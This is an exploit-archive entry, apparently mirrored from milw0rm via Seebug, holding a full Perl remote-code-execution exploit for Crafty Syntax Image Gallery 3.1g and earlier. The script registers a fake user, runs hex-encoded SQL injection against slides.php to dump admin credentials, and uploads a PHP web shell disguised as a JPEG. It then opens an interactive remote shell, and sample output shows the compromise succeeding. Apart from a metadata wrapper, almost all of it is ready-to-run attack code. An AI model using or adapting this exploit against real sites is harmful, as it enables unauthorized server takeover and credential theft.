Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit

2006-04-04T00:00:00

Description

No description provided by source.

{"sourceData": "\n #!/usr/bin/perl\n###############################################################################\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n\n# =====================================================\n# $ crappy_syntax.pl localhost/csig/ 80\n#\n# :: crafty syntax image gallery <= 3.1g\n# :: by undefined1_ @ bash-x.net/undef/\n# :: note: this works only on mysql >= 4.0\n#\n#\n# [+] creating user account\n# [+]\t\tuser: 98fe56123\n#\t\t\tpassword: 7652L4M3l39q\n#\t\t\temail: SehswdSx0E@hotmail.com\n# [+] user '98fe56123' with password '7652L4M3l39q' registered\n# [+] logged in as 98fe56123\n# [+] projectid is 2\n# [-] no admin found for this projectid, trying the username 'admin'\n# [+] admin username: 'admin'\n# [+] admin password: '1111'\n# [+] logged in as 'admin'\n# [+] getting shell location\n# [+] shell @ 'userimages/1/18d76bcbc6f2.php'\n# [+] have phun?\n#\n# localhost$ uname\n# Linux\n# localhost$ whoami\n# nobody\n# =====================================================\n\nuse strict; \nuse IO::Socket;\n\n$| = 1;\nprint ":: crafty syntax image gallery <= 3.1g\\n";\nprint ":: by undefined1_ @ bash-x.net/undef/\\n";\nprint ":: note: this works only on mysql >= 4.0\\n\\n\\n";\n\nmy $website = shift || usage();\nmy $port = shift || usage();\nmy $user = shift;\nmy $password = shift;\nmy $location = shift;\n\n\n\nmy $path = "/";\nmy $server = $website;\nif(index($website, "/") != -1)\n{\n\t$path = substr($website, index($website, "/"));\n\t$server = substr($website, 0, index($website, "/"));\n\tif(substr($path, length($path)-1) ne "/")\n\t{\n\t\t$path .= "/";\n\t}\n}\nif($location eq "")\n{\n\tif($user eq "" && $password eq "")\n\t{\n\t\tprint "[+] creating user account\\n";\n\t\t$user = randstring(8,12);\n\t\t$password = randstring(8,12);\n\t\tmy $email = randstring(8,12)."\\@hotmail.com";\n\t\tprintf("[+]\\tuser: %s\\n", $user);\n\t\tprintf("\\tpassword: %s\\n", $password);\n\t\tprintf("\\temail: %s\\n", $email);\n\t\tregister($server, $path, $user, $user, $password, $email);\n\t}\n\n\tmy $cookies = login($server, $port, $path, $user, $password);\n\tmy $projectid = get_projectid($server, $port, $path, $cookies);\n\tmy @admin = send_payload($server, $port, $path, $cookies, $projectid);\n\n\t$cookies = login($server, $port, $path, $admin[0], $admin[1]);\n\tupload_shell($server, $port, $path, $cookies, $projectid);\n\t$location = get_shell_location($server,$port,$path,$cookies);\n}\n\ncheck_shell($server, $port, $path, $location);\nprintf("[+] have phun?\\n\\n");\nmy $command;\nwhile(1) \n{\n\tprint $server."\\$ ";\n\twhile(<STDIN>) \n\t{\n\t\t$command = $_;\n\t\tchomp($command);\n\t\tlast;\n\t}\n\tdo_shell($server,$port,$path,$location,$command);\n}\n\n\nsub send_payload(\\$,\\$,\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $path = shift;\n\tmy $cookies = shift;\n\tmy $projectid = shift;\n\tmy $shellcode;\n\n\t$shellcode = "\\x61\\x6e\\x64\\x20\\x31\\x3d\\x30\\x20\\x75\\x6e\\x69\\x6f\\x6e\\x20";\n\t$shellcode .= "\\x61\\x6c\\x6c\\x20\\x73\\x65\\x6c\\x65\\x63\\x74\\x20\\x31\\x2c\\x32";\n\t$shellcode .= "\\x2c\\x33\\x2c\\x34\\x2c\\x35\\x2c\\x75\\x73\\x65\\x72\\x69\\x64\\x20";\n\t$shellcode .= "\\x61\\x73\\x20\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6f\\x6e";\n\t$shellcode .= "\\x2c\\x37\\x2c\\x38\\x2c\\x39\\x2c\\x30\\x2c\\x31\\x2c\\x32\\x2c\\x33";\n\t$shellcode .= "\\x2c\\x34\\x2c\\x35\\x2c\\x35\\x20\\x66\\x72\\x6f\\x6d\\x20\\x67\\x61";\n\t$shellcode .= "\\x6c\\x6c\\x65\\x72\\x79\\x5f\\x61\\x63\\x63\\x65\\x73\\x73\\x20\\x77";\n\t$shellcode .= "\\x68\\x65\\x72\\x65\\x20\\x67\\x61\\x6c\\x6c\\x65\\x72\\x79\\x69\\x64";\n\t$shellcode .= "\\x3d";\n\t$shellcode .= $projectid;\n\t$shellcode .= "\\x20\\x61\\x6e\\x64\\x20\\x70\\x65\\x72\\x6d\\x69\\x73\\x73\\x69\\x6f";\n\t$shellcode .= "\\x6e\\x73\\x3d\\x43\\x4f\\x4e\\x43\\x41\\x54\\x28\\x30\\x78\\x34\\x36";\n\t$shellcode .= "\\x35\\x35\\x34\\x63\\x34\\x63\\x29\\x20\\x2d\\x2d";\n\n\tmy $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= $cookies;\n\t$query .= "\\r\\n";\n\tmy $data = sendpacket($server, $port, $query);\n\tif($data !~ /photo_captions\\[1\\] = "/)\n\t{\n\t\tprint "[-] no admin found for this projectid, trying the username 'admin'\\n";\n\t\t$shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --";\n\t\t$query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\\r\\n";\n\t\t$query .= "Host: $server\\r\\n";\n\t\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t\t$query .= "Connection: close\\r\\n";\n\t\t$query .= $cookies;\n\t\t$query .= "\\r\\n";\n\t\tmy $data = sendpacket($server, $port, $query);\n\t\tif($data !~ /photo_captions\\[1\\] = "/ || $data !~ /photo_urls\\[1\\] = "/)\n\t\t{\n\t\t\tprint "[-] exploit failed\\n";\n\t\t\texit;\n\t\t}\n\t\tmy $index1 = index($data, "photo_captions[1] = \\" ") + 22;\n\t\tmy $index2 = index($data, "\\"", $index1);\n\t\tmy $passwd = substr($data, $index1, $index2-$index1);\n\n\t\t$index1 = index($data, "photo_urls[1] = \\"") + 17;\n\t\t$index2 = index($data, "\\"", $index1);\n\t\t$data = substr($data, $index1, $index2-$index1);\n\t\t$index1 = rindex($data, "/") + 1;\n\t\tmy $username = substr($data, $index1);\n\n\n\t\tprint "[+] admin username: '$username'\\n";\n\t\tprint "[+] admin password: '$passwd'\\n";\n\n\t\tmy @ret;\n\t\tpush(@ret, $username);\n\t\tpush(@ret, $passwd);\n\t\treturn @ret;\n\t}\n\tmy $index1 = index($data, "photo_captions[1] = \\" ") + 22;\n\tmy $index2 = index($data, "\\"", $index1);\n\tmy $uid = substr($data, $index1, $index2-$index1);\n\tprint "[+] admin uid: '$uid'\\n";\n\n\n\n\n\n\t$shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=".$uid." --";\n\t$query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= $cookies;\n\t$query .= "\\r\\n";\n\tmy $data = sendpacket($server, $port, $query);\n\tif($data !~ /photo_captions\\[1\\] = "/ || $data !~ /photo_urls\\[1\\] = "/)\n\t{\n\t\tprint "[-] exploit failed (mysql < 4 ?)\\n";\n\t\texit;\n\t}\n\t$index1 = index($data, "photo_captions[1] = \\" ") + 22;\n\t$index2 = index($data, "\\"", $index1);\n\tmy $passwd = substr($data, $index1, $index2-$index1);\n\n\t$index1 = index($data, "photo_urls[1] = \\"") + 17;\n\t$index2 = index($data, "\\"", $index1);\n\t$data = substr($data, $index1, $index2-$index1);\n\t$index1 = rindex($data, "/") + 1;\n\tmy $username = substr($data, $index1);\n\n\n\tprint "[+] admin username: '$username'\\n";\n\tprint "[+] admin password: '$passwd'\\n";\n\n\tmy @ret;\n\tpush(@ret, $username);\n\tpush(@ret, $passwd);\n\treturn @ret;\n}\n\n\nsub do_shell(\\$,\\$,\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $path = shift;\n\tmy $location = shift;\n\tmy $command = shift;\n\n\tmy $d = "c=".$command;\n\tmy $query = "POST ".$path.$location." HTTP/1.1\\r\\n";\n\t$query .= "Content-Type: application/x-www-form-urlencoded\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= "Content-Length: ".length($d)."\\r\\n";\n\t$query .= "\\r\\n";\n\t$query .= $d;\n\t\n\tmy $data = sendpacket($server, $port, $query);\n\tmy $index = index($data, "\\r\\n\\r\\n");\n\tif($index >= 0)\n\t{\n\t\tprint substr($data, $index+4)."\\n";\n\t}\n\telse\n\t{\n\t\tprint "[-] shell error?\\n";\n\t}\n}\n\nsub check_shell(\\$,\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $path = shift;\n\tmy $location = shift;\n\n\t\n\tmy $query = "GET ".$path.$location." HTTP/1.1\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= "\\r\\n";\n\tmy $data = sendpacket($server, $port, $query);\n\n\tif($data !~ /HTTP\\/1.1 200 OK/)\n\t{\n\t\tprint "[-] shell not found\\n";\n\t\tprint "[-] try ".$server.$path."/userimages/\\n";\n\t\texit;\n\t}\n}\n\nsub get_shell_location(\\$,\\$,\\$,\\$) {\t\n\tprint "[+] getting shell location\\n";\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $path = shift;\n\tmy $cookies = shift;\n\tmy $shellcode;\n\n\t$shellcode = "\\x61\\x6e\\x64\\x20\\x69\\x6d\\x61\\x67\\x65\\x20\\x4c\\x49\\x4b\\x45\\x20\\x43";\n\t$shellcode .= "\\x4f\\x4e\\x43\\x41\\x54\\x28\\x30\\x78\\x32\\x35\\x32\\x65\\x37\\x30\\x36\\x38";\n\t$shellcode .= "\\x37\\x30\\x29\\x20\\x6f\\x72\\x64\\x65\\x72\\x20\\x62\\x79\\x20\\x72\\x65\\x63";\n\t$shellcode .= "\\x6e\\x6f\\x20\\x64\\x65\\x73\\x63\\x20\\x6c\\x69\\x6d\\x69\\x74\\x20\\x31\\x20";\n\t$shellcode .= "\\x2d\\x2d";\n\n\t\n\tmy $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= $cookies;\n\t$query .= "\\r\\n";\n\tmy $data = sendpacket($server, $port, $query);\n\tif($data =~ /There are no photos in this gallery/)\n\t{\n\t\tprint "[-] shell not found\\n";\n\t\tprint "[-] try ".$server.$path."/userimages/\\n";\n\t\texit;\n\t}\n\n\tmy $index1 = index($data, "photo_urls[1] = \\"") + 17;\n\tmy $index2 = index($data, "\\"", $index1);\n\tmy $location = substr($data, $index1, $index2-$index1);\n\tprint "[+] shell @ '".$location."'\\n";\n\treturn $location;\n}\n\nsub get_projectid(\\$,\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $path = shift;\n\tmy $cookies = shift;\n\t\n\tmy $query = "GET ".$path."imagemenu.php?html=menu.tpl HTTP/1.1\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= $cookies;\n\t$query .= "\\r\\n";\n\tmy $data = sendpacket($server, $port, $query);\n\tmy $projectid;\n\tif($data =~ /\\?projectid=([0-9]*)/)\n\t{\n\t\t$projectid = $1;\n\t}\n\telse\n\t{\n\t\tprint "[-] no projectid found";\n\t\texit;\n\t}\n\n\tprint "[+] projectid is '$projectid'\\n";\n\treturn $projectid;\n}\n\nsub upload_shell(\\$,\\$,\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $path = shift;\n\tmy $cookies = shift;\n\tmy $projectid = shift;\n\t\n\tmy $query = "GET ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= $cookies;\n\t$query .= "\\r\\n";\n\tmy $data = sendpacket($server, $port, $query);\n\tif($data =~ /Access denied.../)\n\t{\n\t\tprint "[-] no admin privileges (mysql < 4.0 ?)\\n";\n\t\texit;\n\t}\n\n\tmy $shell = "<? if(isset(\\$_POST['c'])) { system(\\$_POST['c']); } ?>";\n\n\tmy $boundary = "-----------------------------220162907215434";\n\tmy $post = "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"projectid\\"\\r\\n\\r\\n";\n\t$post .= $projectid."\\r\\n";\n\n\t$post .= "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"A_MONTH\\"\\r\\n\\r\\n";\n\t$post .= "03\\r\\n";\n\n\t$post .= "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"A_DAY\\"\\r\\n\\r\\n";\n\t$post .= "26\\r\\n";\n\n\t$post .= "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"A_YEAR\\"\\r\\n\\r\\n";\n\t$post .= "2006\\r\\n";\n\n\t$post .= "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"fullimage\\"; filename=\\"my_image.jpg\\"\\r\\n";\n\t$post .= "Content-Type: text/plain\\r\\n\\r\\n";\n\t$post .= $shell."\\r\\n";\n\n\t$post .= "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"description\\"\\r\\n\\r\\n";\n\t$post .= "another image\\r\\n";\n\n\t$post .= "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"ext\\"\\r\\n\\r\\n";\n\t$post .= ".php\\r\\n";\n\n\t$post .= "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"feature__".$projectid."\\"\\r\\n\\r\\n";\n\t$post .= "Y\\r\\n";\n\n\t$post .= "--".$boundary."\\r\\n";\n\t$post .= "Content-Disposition: form-data; name=\\"addnow\\"\\r\\n\\r\\n";\n\t$post .= "ADD\\r\\n";\n\n\t$post .= "--".$boundary."--\\r\\n";\n\n\tmy $query = "POST ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\\r\\n";\n\t$query .= "Content-Type: multipart/form-data; boundary=".$boundary."\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= $cookies;\n\t$query .= "Content-Length: ".length($post)."\\r\\n";\n\t$query .= "\\r\\n";\n\t$query .= $post;\n\n\tsendpacket($server, $port, $query);\n}\n\nsub login(\\$,\\$,\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $path = shift;\n\tmy $username = shift;\n\tmy $password = shift;\n\n\tmy $d = "whattodo=login&myusername=".$username."&mypassword=".$password;\n\tmy $query = "POST ".$path."index.php HTTP/1.1\\r\\n";\n\t$query .= "Content-Type: application/x-www-form-urlencoded\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= "Content-Length: ".length($d)."\\r\\n";\n\t$query .= "\\r\\n";\n\t$query .= $d;\n\n\tmy $data = sendpacket($server, $port, $query);\n\tif($data =~ /<td><b>Your Name:<\\/td><td><input type=text name=myusername/ || $data !~ /Set-Cookie: /)\n\t{\n\t\tprint "[-] failed to login\\n";\n\t\texit;\n\t}\n\t\n\tmy $cookies = "";\t# chocolate cookies\n\tmy $index1 = index($data, "\\r\\n\\r\\n");\n\tif($index1 >= 0)\n\t{\n\t\tmy $index2 = index($data, "Set-Cookie: ") + 12;\n\t\tmy $index3 = index($data, "\\r\\n", $index2);\n\t\t$cookies = "Cookie: ".substr($data, $index2, $index3-$index2+2);\n\t}\n\t\n\tprint "[+] logged in as '$username'\\n";\n\treturn $cookies;\n}\n\nsub register(\\$, \\$, \\$, \\$, \\$, \\$, \\$) {\n\tmy $server = shift;\n\tmy $path = shift;\n\tmy $name = shift;\n\tmy $user = shift;\n\tmy $password = shift;\n\tmy $email = shift;\n\n\tmy $d = "action=register&emailadd=".$email."&newname=".$name."&newusername=".$user."&newpassword=".$password;\n\tmy $query = "POST ".$path."lostsheep.php HTTP/1.1\\r\\n";\n\t$query .= "Content-Type: application/x-www-form-urlencoded\\r\\n";\n\t$query .= "Host: $server\\r\\n";\n\t$query .= "User-Agent: Mozilla/5.0\\r\\n";\n\t$query .= "Connection: close\\r\\n";\n\t$query .= "Content-Length: ".length($d)."\\r\\n";\n\t$query .= "\\r\\n";\n\t$query .= $d;\n\n\tmy $data = sendpacket($server, $port, $query);\n\tif($data =~ /<li>Sorry the username you entered <b><\\/b> is already taken.. try again/)\n\t{\n\t\tprint "[-] failed: username taken\\n";\n\t\texit;\n\t}\n\tif($data =~ /you did not enter in a/)\n\t{\n\t\tprint "[-] failed\\n";\n\t\texit;\n\t}\n\tprint "[+] user '$user' with password '$password' registered\\n";\n}\n\nsub sendpacket(\\$,\\$,\\$) {\n\tmy $server = shift;\n\tmy $port = shift;\n\tmy $request = shift;\n\n\tmy $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die "[-] Could not connect to $server:$port $!\\n";\n\tprint $sock "$request";\n\n\t\n\tmy $data = "";\n\tmy $answer;\n\twhile($answer = <$sock>)\n\t{\n\t\t$data .= $answer;\n\t}\n\t\n\tclose($sock);\n\treturn $data;\n}\n\nsub randstring(\\$,\\$) {\n\tmy $min = shift;\n\tmy $max = shift;\n\n\tmy $length = int( (rand(65535)%($max-$min+1))+$min);\n\tmy $ret = "";\n\tfor(my $i = 0; $i < $length; $i++)\n\t{\n\t\tmy $w = int(rand(3));\n\t\tif($w == 0)\n\t\t{\n\t\t\t$ret .= chr(97 + int(rand(26)));\n\t\t}\n\t\telsif($w == 1)\n\t\t{\n\t\t\t$ret .= chr(65 + int(rand(26)));\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$ret .= chr(48 + int(rand(10)));\n\t\t}\n\t}\n\n\treturn $ret;\n}\n\n\nsub usage() {\n\tprintf "usage: %s <website> <port> [user(optional)] [password(optional)] [shell path without trailing / (optional)]\\n", $0;\n\tprintf "exemple: %s www.site.com/csig/ 80\\n", $0;\n\texit;\n}\n\n\nsub urlEncode {\n my ($string) = @_;\n $string =~ s/(\\W)/"%" . unpack("H2", $1)/ge;\n return $string;\n}\n\n# milw0rm.com [2006-04-04]\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15970", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-15970", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T22:30:58", "published": "2006-04-04T00:00:00", "cvelist": [], "id": "SSV:15970", "enchantments_done": [], "modified": "2006-04-04T00:00:00", "title": "Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.9}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647831412, "score": 1659785532, "epss": 1678851499}}

Crafty Syntax Image Gallery &lt;= 3.1g Remote Code Execution Exploit

Description

Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit